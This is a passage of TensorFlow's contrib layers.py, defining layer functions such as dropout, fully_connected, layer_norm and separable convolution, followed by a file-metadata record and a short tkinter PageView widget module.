sum is unchanged.
Args:
inputs: the tensor to pass to the nn.dropout op.
keep_prob: A scalar `Tensor` with the same type as x. The probability
that each element is kept.
noise_shape: A 1-D `Tensor` of type `int32`, representing the
shape for randomly generated keep/drop flags.
is_training: A bool `Tensor` indicating whether or not the model
is in training mode. If so, dropout is applied and values scaled.
Otherwise, inputs is returned.
outputs_collections: collection to add the outputs.
scope: Optional scope for name_scope.
Returns:
a tensor representing the output of the operation.
"""
with ops.name_scope(scope, 'Dropout', [inputs]) as sc:
inputs = ops.convert_to_tensor(inputs)
dropout_fn = lambda: nn.dropout(inputs, keep_prob, noise_shape)
id_fn = lambda: array_ops.identity(inputs)
outputs = utils.smart_cond(is_training, dropout_fn, id_fn)
return utils.collect_named_outputs(outputs_collections, sc, outputs)
@add_arg_scope
def flatten(inputs,
outputs_collections=None,
scope=None):
"""Flattens the input while maintaining the batch_size.
Assumes that the first dimension represents the batch.
Args:
inputs: a tensor of size [batch_size, ...].
outputs_collections: collection to add the outputs.
scope: Optional scope for name_scope.
Returns:
a flattened tensor with shape [batch_size, k].
Raises:
ValueError: if inputs.shape is wrong.
"""
with ops.name_scope(scope, 'Flatten', [inputs]) as sc:
inputs = ops.convert_to_tensor(inputs)
inputs_shape = inputs.get_shape()
inputs_rank = inputs_shape.ndims
if (inputs_rank is None) or (inputs_rank < 2):
raise ValueError('Inputs must have a least 2 dimensions.')
dims = inputs_shape[1:]
if not dims.is_fully_defined():
raise ValueError('Inputs 2nd dimension must be defined.')
k = dims.num_elements()
outputs = array_ops.reshape(inputs, [-1, k])
return utils.collect_named_outputs(outputs_collections, sc, outputs)
def _sparse_inner_flatten(inputs, new_rank):
"""Helper function for `inner_flatten`."""
outer_dimensions = inputs.shape[:new_rank - 1]
inner_dimensions = inputs.shape[new_rank - 1:]
new_shape = array_ops.concat(0, (outer_dimensions,
[math_ops.reduce_prod(inner_dimensions)]))
flattened = sparse_ops.sparse_reshape(inputs, new_shape)
return flattened
def _dense_inner_flatten(inputs, new_rank):
"""Helper function for `inner_flatten`."""
rank_assertion = check_ops.assert_rank_at_least(
inputs, new_rank, message='inputs has rank less than new_rank')
with ops.control_dependencies([rank_assertion]):
outer_dimensions = array_ops.slice(
array_ops.shape(inputs), [0], [new_rank - 1])
new_shape = array_ops.concat(0, (outer_dimensions, [-1]))
reshaped = array_ops.reshape(inputs, new_shape)
# if `new_rank` is an integer, try to calculate new shape.
if isinstance(new_rank, six.integer_types):
static_shape = inputs.get_shape()
if static_shape is not None and static_shape.dims is not None:
static_shape = static_shape.as_list()
static_outer_dims = static_shape[:new_rank - 1]
static_inner_dims = static_shape[new_rank - 1:]
flattened_dimension = 1
for inner_dim in static_inner_dims:
if inner_dim is None:
flattened_dimension = None
break
flattened_dimension *= inner_dim
reshaped.set_shape(static_outer_dims + [flattened_dimension])
return reshaped
@add_arg_scope
def _inner_flatten(inputs, new_rank, output_collections=None, scope=None):
"""Flattens inner dimensions of `inputs`, returns a Tensor with `new_rank`.
For example:
'''
x = tf.random_uniform(shape=[1, 2, 3, 4, 5, 6])
y = _inner_flatten(x, 4)
assert y.get_shape().as_list() == [1, 2, 3, (4 * 5 * 6)]
'''
This layer will fail at run time if `new_rank` is greater than the current
rank of `inputs`.
Args:
inputs: a `Tensor` or `SparseTensor`.
new_rank: the desired rank of the returned `Tensor` or `SparseTensor`.
output_collections: collection to which the outputs will be added.
scope: optional scope for `name_scope`.
Returns:
A `Tensor` or `SparseTensor` conataining the same values as `inputs`, but
with innermost dimensions flattened to obtain rank `new_rank`.
Raises:
TypeError: `inputs` is not a `Tensor` or `SparseTensor`.
"""
with ops.name_scope(scope, 'InnerFlatten', [inputs, new_rank]) as sc:
if isinstance(inputs, ops.SparseTensor):
flattened = _sparse_inner_flatten(inputs, new_rank)
else:
inputs = ops.convert_to_tensor(inputs)
flattened = _dense_inner_flatten(inputs, new_rank)
return utils.collect_named_outputs(output_collections, sc, flattened)
@add_arg_scope
def fully_connected(inputs,
num_outputs,
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer,
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds a fully connected layer.
`fully_connected` creates a variable called `weights`, representing a fully
connected weight matrix, which is multiplied by the `inputs` to produce a
`Tensor` of hidden units. If a `normalizer_fn` is provided (such as
`batch_norm`), it is then applied. Otherwise, if `normalizer_fn` is
None and a `biases_initializer` is provided then a `biases` variable would be
created and added the hidden units. Finally, if `activation_fn` is not `None`,
it is applied to the hidden units as well.
Note: that if `inputs` have a rank greater than 2, then `inputs` is flattened
prior to the initial matrix multiply by `weights`.
Args:
inputs: A tensor of with at least rank 2 and value for the last dimension,
i.e. `[batch_size, depth]`, `[None, None, None, channels]`.
num_outputs: Integer or long, the number of output units in the layer.
activation_fn: activation function, set to None to skip it and maintain
a linear activation.
normalizer_fn: normalization function to use instead of `biases`. If
`normalizer_fn` is provided then `biases_initializer` and
`biases_regularizer` are ignored and `biases` are not created nor added.
default set to None for no normalizer function
normalizer_params: normalization function parameters.
weights_initializer: An initializer for the weights.
weights_regularizer: Optional regularizer for the weights.
biases_initializer: An initializer for the biases. If None skip biases.
biases_regularizer: Optional regularizer for the biases.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: Optional list of collections for all the variables or
a dictionary containing a different list of collections per variable.
outputs_collections: collection to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for variable_scope.
Returns:
the tensor variable representing the result of the series of operations.
Raises:
ValueError: if x has rank less than 2 or if its last dimension is not set.
"""
if not (isinstance(num_outputs, int) or isinstance(num_outputs, long)):
raise ValueError('num_outputs should be int or long, got %s.', num_outputs)
with variable_scope.variable_scope(scope, 'fully_connected', [inputs],
reuse=reuse) as sc:
inputs = ops.convert_to_tensor(inputs)
dtype = inputs.dtype.base_dtype
inputs_shape = inputs.get_shape()
num_input_units = utils.last_dimension(inputs_shape, min_rank=2)
static_shape = inputs_shape.as_list()
static_shape[-1] = num_outputs
out_shape = array_ops.unpack(array_ops.shape(inputs))
out_shape[-1] = num_outputs
weights_shape = [num_input_units, num_outputs]
weights_collections = utils.get_variable_collections(
variables_collections, 'weights')
weights = variables.model_variable('weights',
shape=weights_shape,
dtype=dtype,
initializer=weights_initializer,
regularizer=weights_regularizer,
collections=weights_collections,
trainable=trainable)
if len(static_shape) > 2:
# Reshape inputs
inputs = array_ops.reshape(inputs, [-1, num_input_units])
outputs = standard_ops.matmul(inputs, weights)
if normalizer_fn is not None:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
else:
if biases_initializer is not None:
biases_collections = utils.get_variable_collections(
variables_collections, 'biases')
biases = variables.model_variable('biases',
shape=[num_outputs,],
dtype=dtype,
initializer=biases_initializer,
regularizer=biases_regularizer,
collections=biases_collections,
trainable=trainable)
outputs = nn.bias_add(outputs, biases)
if activation_fn is not None:
outputs = activation_fn(outputs)
if len(static_shape) > 2:
# Reshape back outputs
outputs = array_ops.reshape(outputs, array_ops.pack(out_shape))
outputs.set_shape(static_shape)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
@add_arg_scope
def layer_norm(inputs,
center=True,
scale=True,
activation_fn=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds a Layer Normalization layer from https://arxiv.org/abs/1607.06450.
"Layer Normalization"
Jimmy Lei Ba, Jamie Ryan Kiros, Geoffrey E. Hinton
Can be used as a normalizer function for conv2d and fully_connected.
Args:
inputs: a tensor with 2 or more dimensions. The normalization
occurs over all but the first dimension.
center: If True, subtract `beta`. If False, `beta` is ignored.
scale: If True, multiply by `gamma`. If False, `gamma` is
not used. When the next layer is linear (also e.g. `nn.relu`), this can be
disabled since the scaling can be done by the next layer.
activation_fn: activation function, default set to None to skip it and
maintain a linear activation.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: optional collections for the variables.
outputs_collections: collections to add the outputs.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
scope: Optional scope for `variable_op_scope`.
Returns:
A `Tensor` representing the output of the operation.
Raises:
ValueError: if rank or last dimension of `inputs` is undefined.
"""
with variable_scope.variable_scope(scope, 'LayerNorm', [inputs],
reuse=reuse) as sc:
inputs = ops.convert_to_tensor(inputs)
inputs_shape = inputs.get_shape()
inputs_rank = inputs_shape.ndims
if inputs_rank is None:
raise ValueError('Inputs %s has undefined rank.' % inputs.name)
dtype = inputs.dtype.base_dtype
axis = list(range(1, inputs_rank))
params_shape = inputs_shape[-1:]
if not params_shape.is_fully_defined():
raise ValueError('Inputs %s has undefined last dimension %s.' % (
inputs.name, params_shape))
# Allocate parameters for the beta and gamma of the normalization.
beta, gamma = None, None
if center:
beta_collections = utils.get_variable_collections(variables_collections,
'beta')
beta = variables.model_variable('beta',
shape=params_shape,
dtype=dtype,
initializer=init_ops.zeros_initializer,
collections=beta_collections,
trainable=trainable)
if scale:
gamma_collections = utils.get_variable_collections(variables_collections,
'gamma')
gamma = variables.model_variable('gamma',
shape=params_shape,
dtype=dtype,
initializer=init_ops.ones_initializer,
collections=gamma_collections,
trainable=trainable)
# Calculate the moments on the last axis (layer activations).
mean, variance = nn.moments(inputs, axis, keep_dims=True)
# Compute layer normalization using the batch_normalization function.
variance_epsilon = 1E-12
outputs = nn.batch_normalization(
inputs, mean, variance, beta, gamma, variance_epsilon)
outputs.set_shape(inputs_shape)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope,
outputs)
@add_arg_scope
def max_pool2d(inputs,
kernel_size,
stride=2,
padding='VALID',
data_format=DATA_FORMAT_NHWC,
outputs_collections=None,
scope=None):
"""Adds a 2D Max Pooling op.
It is assumed that the pooling is done per image but not in batch or channels.
Args:
inputs: A 4-D tensor of shape `[batch_size, height, width, channels]` if
`data_format` is `NHWC`, and `[batch_size, channels, height, width]` if
`data_format` is `NCHW`.
kernel_size: A list of length 2: [kernel_height, kernel_width] of the
pooling kernel over which the op is computed. Can be an int if both
values are the same.
stride: A list of length 2: [stride_height, stride_width].
Can be an int if both strides are the same. Note that presently
both strides must have the same value.
padding: The padding method, either 'VALID' or 'SAME'.
data_format: A string. `NHWC` (default) and `NCHW` are supported.
outputs_collections: The collections to which the outputs are added.
scope: Optional scope for name_scope.
Returns:
A `Tensor` representing the results of the pooling operation.
Raises:
ValueError: if `data_format` is neither `NHWC` nor `NCHW`.
ValueError: If 'kernel_size' is not a 2-D list
"""
if data_format not in (DATA_FORMAT_NCHW, DATA_FORMAT_NHWC):
raise ValueError('data_format has to be either NCHW or NHWC.')
with ops.name_scope(scope, 'MaxPool2D', [inputs]) as sc:
inputs = ops.convert_to_tensor(inputs)
kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
stride_h, stride_w = utils.two_element_tuple(stride)
if data_format == DATA_FORMAT_NHWC:
ksize = [1, kernel_h, kernel_w, 1]
strides = [1, stride_h, stride_w, 1]
else:
ksize = [1, 1, kernel_h, kernel_w]
strides = [1, 1, stride_h, stride_w]
outputs = nn.max_pool(inputs,
ksize=ksize,
strides=strides,
padding=padding,
data_format=data_format)
return utils.collect_named_outputs(outputs_collections, sc, outputs)
@add_arg_scope
def one_hot_encoding(labels,
num_classes,
on_value=1.0,
off_value=0.0,
outputs_collections=None,
scope=None):
"""Transform numeric labels into onehot_labels using `tf.one_hot`.
Args:
labels: [batch_size] target labels.
num_classes: total number of classes.
on_value: A scalar defining the on-value.
off_value: A scalar defining the off-value.
outputs_collections: collection to add the outputs.
scope: Optional scope for name_scope.
Returns:
one hot encoding of the labels.
"""
with ops.name_scope(scope, 'OneHotEncoding', [labels, num_classes]) as sc:
labels = ops.convert_to_tensor(labels)
if labels.dtype == dtypes.int32:
labels = standard_ops.to_int64(labels)
outputs = standard_ops.one_hot(labels,
num_classes,
on_value=on_value,
off_value=off_value)
return utils.collect_named_outputs(outputs_collections, sc, outputs)
def _apply_activation(y, activation_fn, output_collections):
if activation_fn is not None:
y = activation_fn(y)
ops.add_to_collections(list(output_collections or []) +
[ops.GraphKeys.ACTIVATIONS], y)
return y
def repeat(inputs, repetitions, layer, *args, **kwargs):
"""Applies the same layer with the same arguments repeatedly.
```python
y = repeat(x, 3, conv2d, 64, [3, 3], scope='conv1')
# It is equivalent to:
x = conv2d(x, 64, [3, 3], scope='conv1/conv1_1')
x = conv2d(x, 64, [3, 3], scope='conv1/conv1_2')
y = conv2d(x, 64, [3, 3], scope='conv1/conv1_3')
```
If the `scope` argument is not given in `kwargs`, it is set to
`layer.__name__`, or `layer.func.__name__` (for `functools.partial`
objects). If neither `__name__` nor `func.__name__` is available, the
layers are called with `scope='stack'`.
Args:
inputs: A `Tensor` suitable for layer.
repetitions: Int, number of repetitions.
layer: A layer with arguments `(inputs, *args, **kwargs)`
*args: Extra args for the layer.
**kwargs: Extra kwargs for the layer.
Returns:
a tensor result of applying the layer, repetitions times.
Raises:
ValueError: if the op is unknown or wrong.
"""
scope = kwargs.pop('scope', None)
with variable_scope.variable_scope(scope, 'Repeat', [inputs]):
inputs = ops.convert_to_tensor(inputs)
if scope is None:
if hasattr(layer, '__name__'):
scope = layer.__name__
elif hasattr(layer, 'func') and hasattr(layer.func, '__name__'):
scope = layer.func.__name__ # In case layer is a functools.partial.
else:
scope = 'repeat'
outputs = inputs
for i in range(repetitions):
kwargs['scope'] = scope + '_' + str(i+1)
outputs = layer(outputs, *args, **kwargs)
return outputs
@add_arg_scope
def separable_convolution2d(
inputs,
num_outputs,
kernel_size,
depth_multiplier,
stride=1,
padding='SAME',
activation_fn=nn.relu,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=initializers.xavier_initializer(),
weights_regularizer=None,
biases_initializer=init_ops.zeros_initializer,
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None):
"""Adds a depth-separable 2D convolution with optional batch_norm layer.
This op first performs a depthwise convolution that acts separately on
channels, creating a variable called `depthwise_weights`. If `num_outputs`
is not None, it adds a pointwise convolution that mixes channels, creating a
variable called `pointwise_weights`. Then, if `batch_norm_params` is None,
it adds bias to the result, creating a variable called 'biases', otherwise
it adds a batch normalization layer. It finally applies an activation function
to produce the end result.
Args:
inputs: a tensor of size [batch_size, height, width, channels].
num_outputs: the number of pointwise convolution output filters. If is
None, then we skip the pointwise convolution stage.
kernel_size: a list of length 2: [kernel_height, kernel_width] of
of the filters. Can be an int if both values are the same.
depth_multiplier: the number of depthwise convolution output channels for
each input channel. The total number of depthwise convolution output
channels will be equal to `num_filters_in * depth_multiplier`.
stride: a list of length 2: [stride_height, stride_width], specifying the
depthwise convolution stride. Can be an int if both strides are the same.
padding: one of 'VALID' or 'SAME'.
activation_fn: activation function, set to None to skip it and maintain
a linear activation.
normalizer_fn: normalization function to use instead of `biases`. If
`normalizer_fn` is provided then `biases_initializer` and
`biases_regularizer` are ignored and `biases` are not created nor added.
default set to None for no normalizer function
normalizer_params: normalization function parameters.
weights_initializer: An initializer for the weights.
weights_regularizer: Optional regularizer for the weights.
biases_initializer: An initializer for the biases. If None skip biases.
biases_regularizer: Optional regularizer for the biases.
reuse: whether or not the layer and its variables should be reused. To be
able to reuse the layer scope must be given.
variables_collections: optional list of collections for all the variables or
a dictionay containing a different list of collection per variable.
outputs_collections: collection to add the outputs.
trainable: whether or not the variables should be trainable or not.
scope: Optional scope for variable_scope.
Returns:
A `Tensor` representing the output of the operation.
"""
with variable_scope.variable_scope(
scope, 'SeparableConv2d', [inputs], reuse=reuse) as sc:
dtype = inputs.dtype.base_dtype
kernel_h, kernel_w = utils.two_element_tuple(kernel_size)
stride_h, stride_w = utils.two_element_tuple(stride)
num_filters_in = utils.last_dimension(inputs.get_shape(), min_rank=4)
weights_collections = utils.get_variable_collections(
variables_collections, 'weights')
depthwise_shape = [kernel_h, kernel_w,
num_filters_in, depth_multiplier]
depthwise_weights = variables.model_variable(
'depthwise_weights',
shape=depthwise_shape,
dtype=dtype,
initializer=weights_initializer,
regularizer=weights_regularizer,
trainable=trainable,
collections=weights_collections)
strides = [1, stride_h, stride_w, 1]
if num_outputs is not None:
# Full separable convolution: Depthwise followed by pointwise convolution.
pointwise_shape = [1, 1, depth_multiplier * num_filters_in,
num_outputs]
pointwise_weights = variables.model_variable(
'pointwise_weights',
shape=pointwise_shape,
dtype=dtype,
initializer=weights_initializer,
regularizer=weights_regularizer,
trainable=trainable,
collections=weights_collections)
outputs = nn.separable_conv2d(inputs,
depthwise_weights,
pointwise_weights,
strides,
padding)
else:
# Depthwise convolution only.
outputs = nn.depthwise_conv2d(inputs, depthwise_weights, strides, padding)
num_outputs = depth_multiplier * num_filters_in
if normalizer_fn is not None:
normalizer_params = normalizer_params or {}
outputs = normalizer_fn(outputs, **normalizer_params)
else:
if biases_initializer is not None:
biases_collections = utils.get_variable_collections(
variables_collections, 'biases')
biases = variables.model_variable('biases',
shape=[num_outputs,],
dtype=dtype,
initializer=biases_initializer,
regularizer=biases_regularizer,
collections=biases_collections)
outputs = nn.bias_add(outputs, biases)
if activation_fn is not None:
outputs = activation_fn(outputs)
return utils.collect_named_outputs(outputs_collections,
sc.original_name_scope, outputs)
@add_arg_scope
def softmax(logits, scope=None):
"""Performs softmax on Nth dimension of N-dimensional logit tensor.
For two-dimensional logits this reduces to tf.nn.softmax. The N-th dimension
needs to have a specified number of elements (number of classes).
Args:
logits: N-dimensional `Tensor` with logits, where N > 1.
scope: Optional scope for variable_scope.
Returns:
a `Tensor` with same shape and type as logits.
"""
# TODO(jrru): Add axis argument which defaults to last dimension.
with variable_scope.variable_scope(scope, 'softmax', [logits]):
num_logits = utils.last_dimension(logits.get_shape(), min_rank=2)
logits_2d = array_ops.reshape(logits, [-1, num_logits])
predictions = nn.softmax(logits_2d)
predictions = array_ops.reshape(predictions, array_ops.shape(logits))
predictions.set_shape(logits.get_shape())
return predictions
def stack(inputs, layer, stack_args, **kwargs):
"""Builds a stack of layers by applying layer repeatedly using stack_args.
`stack` allows you to repeatedly apply the same operation with different
arguments `stack_args[i]`. For each application of the layer, `stack` creates
a new scope appended with an increasing number. For example:
```python
y = stack(x, fully_connected, [32, 64, 128], scope='fc')
# It is equivalent to:
x = fully_connected(x, 32, scope='fc/fc_1')
x = fully_connected(x, 64, scope='fc/fc_2')
y = fully_connected(x, 128, scope='fc/fc_3')
```
If the `scope` argument is not given in `kwargs`, it is set to
`layer.__name__`, or `layer.func.__name__` (for `functools.partial`
objects). If neither `__name__` nor `func.__name__` is available, the
layers are called with `scope='stack'`.
Args:
inputs: A `Tensor` suitable for layer.
layer: A layer with arguments `(inputs, *args, **kwargs)`
stack_args: A list/tuple of parameters for each call of layer.
**kwargs: Extra kwargs for the layer.
Returns:
a `Tensor` result of applying the stacked layers.
Raises:
ValueError: if the op is unknown or wrong.
"""
scope = kwargs.pop('scope', None)
if not isinstance(stack_args, (list, tuple)):
raise ValueError('stack_args need to be a list or tuple')
with variable_scope.variable_scope(scope, 'Stack', [inputs]):
inputs = ops.convert_to_tensor(inputs)
if scope is None:
if hasattr(layer, '__name__'):
scope = layer.__name__
elif hasattr(layer, 'func') and hasattr(layer.func, '__name__'):
scope = layer.func.__name__ # In case layer is a functools.partial.
else:
scope = 'stack'
outputs = inputs
for i in range(len(stack_args)):
kwargs['scope'] = scope + '_' + str(i+1)
layer_args = stack_args[i]
if not isinstance(layer_args, (list, tuple)):
layer_args = [layer_args]
outputs = layer(outputs, *layer_args, **kwargs)
return outputs
@add_arg_scope
def unit_norm(inputs, dim, epsilon=1e-7, scope=None):
"""Normalizes the given input across the specified dimension to unit length.
Note that the rank of `input` must be known.
Args:
inputs: A `Tensor` of arbitrary size.
dim: The dimension along which the input is normalized.
epsilon: A small value to add to the inputs to avoid dividing by zero.
scope: Optional scope for variable_scope.
Returns:
The normalized `Tensor`.
Raises:
ValueError: If dim is smaller than the number of dimensions in 'inputs'.
"""
with variable_scope.variable_scope(scope, 'UnitNorm', [inputs]):
if not inputs.get_shape():
raise ValueError('The input rank must be known.')
input_rank = len(inputs.get_shape().as_list())
if dim < 0 or dim >= input_rank:
raise ValueError(
'dim must be positive but smaller than the input rank.')
lengths = math_ops.sqrt(epsilon + math_ops.reduce_sum(
math_ops.square(inputs), dim, True))
multiples = []
if dim > 0:
multiples.append(array_ops.ones([dim], dtypes.int32))
multiples.append(array_ops.slice(array_ops.shape(inputs), [dim], [1]))
if dim < (input_rank - 1):
multiples.append(array_ops.ones([input_rank - 1 - dim], dtypes.int32))
multiples = array_ops.concat(0, multiples)
return math_ops.div(inputs, array_ops.tile(lengths, multiples))
def legacy_fully_connected(x,
num_output_units,
activation_fn=None,
weight_init=initializers.xavier_initializer(),
bias_init=init_ops.zeros_initializer,
name=None,
weight_collections=(ops.GraphKeys.WEIGHTS,),
bias_collections=(ops.GraphKeys.BIASES,),
output_collections=(ops.GraphKeys.ACTIVATIONS,),
trainable=True,
weight_regularizer=None,
bias_regularizer=None):
# pylint: disable=anomalous-backslash-in-string
r"""Adds the parameters for a fully connected layer and returns the output.
A fully connected layer is generally defined as a matrix multiply:
`y = f(w * x + b)` where `f` is given by `activation_fn`. If
`activation_fn` is `None`, the result of `y = w * x + b` is
returned.
If `x` has shape [\\\(\\text{dim}_0, \\text{dim}_1, ..., \\text{dim}_n\\\)]
with more than 2 dimensions (\\\(n > 1\\\)), then we repeat the matrix
multiply along the first dimensions. The result r is a tensor of shape
[\\\(\\text{dim}_0, ..., \\text{dim}_{n-1},\\\) `num_output_units`],
where \\\( r_{i_0, ..., i_{n-1}, k} =
\\sum_{0 \\leq j < \\text{dim}_n} x_{i_0, ... i_{n-1}, j} \cdot w_{j, k}\\\).
This is accomplished by reshaping `x` to 2-D
[\\\(\\text{dim}_0 \\cdot ... \\cdot \\text{dim}_{n-1}, \\text{dim}_n\\\)]
before the matrix multiply and afterwards reshaping it to
[\\\(\\text{dim}_0, ..., \\text{dim}_{n-1},\\\) `num_output_units`].
This op creates `w` and optionally `b`. Bias (`b`) can be disabled by setting
`bias_init` to `None`.
The variable creation is compatible with `tf.variable_scope` and so can be
reused with `tf.variable_scope` or `tf.make_template`.
Most of the details of variable creation can be controlled by specifying the
initializers (`weight_init` and `bias_init`) and in which collections to place
the created variables (`weight_collections` and `bias_collections`; note that
the variables are always added to the `VARIABLES` collection). The output of
the layer can be placed in custom collections using `output_collections`.
The collections arguments default to `WEIGHTS`, `BIASES` and `ACTIVATIONS`,
respectively.
A per layer regularization can be specified by setting `weight_regularizer`
and `bias_regularizer`, which are applied to the weights and biases
respectively, and whose output is added to the `REGULARIZATION_LOSSES`
collection.
Args:
x: The input `Tensor`.
num_output_units: The size of the output.
activation_fn: activation function, default set to None to skip it and
maintain a linear activation.
weight_init: An optional weight initialization, defaults to
`xavier_initializer`.
bias_init: An initializer for the bias, defaults to 0. Set to `None` in
order to disable bias.
name: The name for this operation is used to name operations and to find
variables. If specified it must be unique for this scope, otherwise a
unique name starting with "fully_connected" will be created. See
`tf.variable_scope` for details.
weight_collections: List of graph collections to which weights are added.
bias_collections: List of graph collections to which biases are added.
output_collections: List of graph collections to which outputs are added.
trainable: If `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
weight_regularizer: A regularizer like the result of
`l1_regularizer` or `l2_regularizer`. Used for weights.
bias_regularizer: A regularizer like the result of
`l1_regularizer` or `l2_regularizer`. Used for biases.
Returns:
The output of the fully connected layer.
Raises:
ValueError: if x has rank less than 2 or if its last dimension is not set.
"""
with variable_scope.variable_scope(name, 'fully_connected', [x]):
x = ops.convert_to_tensor(x)
dims = x.get_shape().dims
if dims is None:
raise ValueError('dims of x must be known but is None')
if len(dims) < 2:
raise ValueError('rank of x must be at least 2 not: %d' % len(dims))
num_input_units = dims[-1].value
if num_input_units is None:
raise ValueError('last dimension of x must be known but is None')
dtype = x.dtype.base_dtype
weight_collections = set(list(weight_collections or []) +
[ops.GraphKeys.VARIABLES])
w = variable_scope.get_variable('weights',
shape=[num_input_units, num_output_units],
dtype=dtype,
initializer=weight_init,
collections=weight_collections,
regularizer=weight_regularizer,
trainable=trainable)
x_2_dim = x if len(dims) <= 2 else array_ops.reshape(x,
[-1, num_input_units])
y = standard_ops.matmul(x_2_dim, w)
if bias_init is not None:
bias_collections = set(list(bias_collections or []) +
[ops.GraphKeys.VARIABLES])
b = variable_scope.get_variable('bias',
shape=[num_output_units],
dtype=dtype,
initializer=bias_init,
collections=bias_collections,
regularizer=bias_regularizer,
trainable=trainable)
y = nn.bias_add(y, b)
if len(dims) > 2:
out_shape = array_ops.unpack(array_ops.shape(x))
out_shape[-1] = num_output_units
y = array_ops.reshape(y, array_ops.pack(out_shape))
static_shape = x.get_shape().as_list()
static_shape[-1] = num_output_units
y.set_shape(static_shape)
return _apply_activation(y, activation_fn, output_collections)
# TODO(eiderm): Verify and fix autocomplete in colab (also relu6).
# Simple aliases which remove the activation_fn parameter.
legacy_relu = functools.partial(legacy_fully_connected, activation_fn=nn.relu)
legacy_linear = functools.partial(legacy_fully_connected, activation_fn=None)
relu = functools.partial(fully_connected, activation_fn=nn.relu)
relu6 = functools.partial(fully_connected, activation_fn=nn.relu6)
linear = functools.partial(fully_connected, activation_fn=None)
# Simple alias.
conv2d = convolution2d
conv2d_transpose = convolution2d_transpose
conv2d_in_plane = convolution2d_in_plane
separable_conv2d = separable_convolution2d
| {
"content_hash": "495e89965a601526f0c1347a9becc86b",
"timestamp": "",
"source": "github",
"line_count": 1865,
"max_line_length": 80,
"avg_line_length": 43.83699731903485,
"alnum_prop": 0.6341063652820588,
"repo_name": "XueqingLin/tensorflow",
"id": "2f2db2953be2ea0f026c15b5161d626f215765db",
"size": "82494",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tensorflow/contrib/layers/python/layers/layers.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "92785"
},
{
"name": "C++",
"bytes": "13132936"
},
{
"name": "CMake",
"bytes": "66864"
},
{
"name": "CSS",
"bytes": "774"
},
{
"name": "Go",
"bytes": "52718"
},
{
"name": "HTML",
"bytes": "508110"
},
{
"name": "Java",
"bytes": "51034"
},
{
"name": "JavaScript",
"bytes": "12972"
},
{
"name": "Jupyter Notebook",
"bytes": "1833435"
},
{
"name": "Makefile",
"bytes": "26273"
},
{
"name": "Objective-C",
"bytes": "7056"
},
{
"name": "Objective-C++",
"bytes": "64592"
},
{
"name": "Protocol Buffer",
"bytes": "137044"
},
{
"name": "Python",
"bytes": "12358531"
},
{
"name": "Shell",
"bytes": "266414"
},
{
"name": "TypeScript",
"bytes": "696788"
}
],
"symlink_target": ""
} |
""""""
import tkinter as tk
from tkinter import ttk
# link
__title__ = "PageView"
__version__ = "1.2.3"
__author__ = "DeflatedPickle"
class PageView(ttk.Frame):
"""
-----DESCRIPTION-----
A navigable frame that can hold however many pages you want.
-----USAGE-----
pageView = PageView(parent, back_text=[string], next_text=[string])
pageView.pack()
frame = ttk.Frame(pageView.frame)
pageView.add(child=frame)
-----PARAMETERS-----
parent = The parent of the widget.
back_text = The text on the back Button.
next_text = The text on the next Button.
-----CONTENTS-----
---VARIABLES---
parent = The parent of the widget.
_back_text = The text on the back Button.
_next_text = The text on the next Button.
_total_pages = The count of total pages.
_frame_list = A list of all the added pages.
---TKINTER VARIABLES---
_index = The current page.
_page = The current page out of total pages.
---WIDGETS---
self
frame = Holds the active page.
_navigation_frame = Hold the navigational widgets.
_back = Allows the user to move backwards a page.
_label = Shows the current frame out of the total frames.
_next = Allows the user to move forward a page.
---FUNCTIONS---
_back() = Moves to the page before the active one.
_next() = Moves to the page after the active one.
add() = Adds a new page to the widget.
_work_out_pages() = Works out how many pages there are in total.
"""
def __init__(self, parent, back_text="< Back", next_text="Next >", *args):
ttk.Frame.__init__(self, parent, *args)
self.parent = parent
self._back_text = back_text
self._next_text = next_text
self._total_pages = 0
self._frame_list = []
self._index = tk.IntVar()
self._index.set(0)
self._page = tk.StringVar()
self._page.set("0 / 0")
self.frame = ttk.Frame(self)
self.frame.pack(side="top", fill="both", expand=True)
self._navigation_frame = ttk.Frame(self)
self._navigation_frame.pack(side="bottom", fill="x")
self._navigation_frame.columnconfigure(1, weight=1)
self._back = ttk.Button(self._navigation_frame, text=back_text, command=self._back)
self._back.grid(row=0, column=0)
self._label = ttk.Label(self._navigation_frame, textvariable=self._page)
self._label.grid(row=0, column=1)
self._next = ttk.Button(self._navigation_frame, text=next_text, command=self._next)
self._next.grid(row=0, column=2)
def _back(self):
"""Moves the PageView backwards a page."""
if self._index.get() != 0:
for i in range(len(self._frame_list)):
self._frame_list[i].pack_forget()
self._index.set(self._index.get() - 1)
self._frame_list[self._index.get()].pack(fill="both", expand=True)
self._work_out_pages()
def _next(self):
"""Moves the PageView forwards a page."""
if self._index.get() != len(self._frame_list) - 1:
for i in range(len(self._frame_list)):
self._frame_list[i].pack_forget()
self._index.set(self._index.get() + 1)
self._frame_list[self._index.get()].pack(fill="both", expand=True)
self._work_out_pages()
def add(self, child=None):
"""Adds a new page to the PageView."""
self._frame_list.append(child)
self._frame_list[self._index.get()].pack(fill="both", expand=True)
self._total_pages = str(len(self._frame_list))
self._work_out_pages()
def _work_out_pages(self):
self._page.set(str(self._index.get() + 1) + "/" + str(self._total_pages))
##################################################
if __name__ == "__main__":
root = tk.Tk()
pview = PageView(root)
pview.pack(expand=True, padx=5, pady=5)
